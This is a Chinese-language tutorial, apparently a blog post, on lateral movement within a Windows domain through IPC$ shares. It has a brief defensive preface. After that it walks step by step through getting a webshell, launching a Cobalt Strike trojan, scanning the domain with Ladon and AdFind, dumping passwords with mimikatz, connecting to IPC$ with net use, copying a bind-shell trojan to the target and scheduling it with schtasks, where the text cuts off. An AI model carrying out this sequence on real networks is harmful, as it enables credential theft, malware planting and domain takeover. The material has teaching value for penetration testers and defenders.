内网安全-常见横向移动总结

域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术，尤其是在高级持续威胁中，攻击者会利用该技术，以被攻陷的机器为跳板，访问其他域内主机，扩大资产范围(包括跳板机器中的文档和存储的凭证，以及通过跳板机器连接的数据库、域控制器或其他重要资产)。

通过此类攻击手段，攻击者最终可能获取域控制器的访问权限，甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此，必须使用强口令来保护特权用户不被用于横向移动攻击，从而避免域内其他机器沦陷。建议管理员定期修改密码，从而使攻击者获取的权限失效。

横向移动手法

IPC

简介：IPC是专用管道，可以实现对远程计算机的访问，

条件：需要使用目标系统用户的账号密码，使用139、445端口。

利用流程：

1. 建立IPC链接到目标主机

2. 拷贝要执行的命令脚本到目标主机

3. 查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本

4. 删除IPC链接

演示：

横向移动

测试环境：192.168.224.129代替192.168.46.146

通过外网网站渗透拿到一个webs hell，然后连接菜刀

上传一个cs生成的木马，菜刀执行这个马，cs上线，提权这个上线的目标以获取更多信息。

下一步：信息收集-上传Ladon64.exe,AdFind.exe-

ipconfig #查看内网网段

shell ladon64.exe 192.168.3.0/24 onlinepc #3网段存活主机扫描

shell AdFind -sc dolist #获取域控名称

ping 域控得到域控IP

shell AdFind -users name #获取域内所有用户名

正在上传…重新上传取消正在上传…重新上传取消正在上传…重新上传取消

net view #查看存活主机

run mimkaz #获取密文/明文/密码

信息收集-确定每台机器的角色

下一步：ipc横向渗透

利用流程

IPC是专用管道，可以实现对远程计算机的访问，

前提条件：需要使用目标系统用户的账号密码，使用139、445端口。

1. 建立IPC链接到目标主机

2. 拷贝要执行的命令脚本到目标主机

3. 查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本

4. 删除IPC链接

net use \\server\ipc$ "password" /user:username # 工作组

net use \\server\ipc$ "password" /user:domain\username #域内

dir \\xx.xx.xx.xx\C$\                # 查看文件列表

copy \\xx.xx.xx.xx\C$\1.bat 1.bat  # 下载文件

copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件

net use \\xx.xx.xx.xx\C$\1.bat /del  # 删除IPC

net view xx.xx.xx.xx                # 查看对方共享

#建立IPC常见的错误代码

（1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限

（2）51：网络问题，Windows 无法找到网络路径

（3）53：找不到网络路径，可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题

（4）67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除ipc$

（5）1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除

（6）1326：账号密码错误

（7）1792：目标NetLogon服务未启动，连接域控常常会出现此情况

（8）2242：用户密码过期，目标有账号策略，强制定期更改密码

 #建立IPC失败的原因

（1）目标系统不是NT或以上的操作系统

（2）对方没有打开IPC$共享

（3）对方未开启139、445端口，或者被防火墙屏蔽

（4）输出命令、账号密码有错误

绑定本地4444，执行该木马后把数据给到本机的4444端口，然后用一台可以访问它的机器去连接它。

然后把这个木马上传到web server这台机器上，然后复制文件到ipc连接的机器上

copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件

schtasks /create /s 192.168.3.32 /ru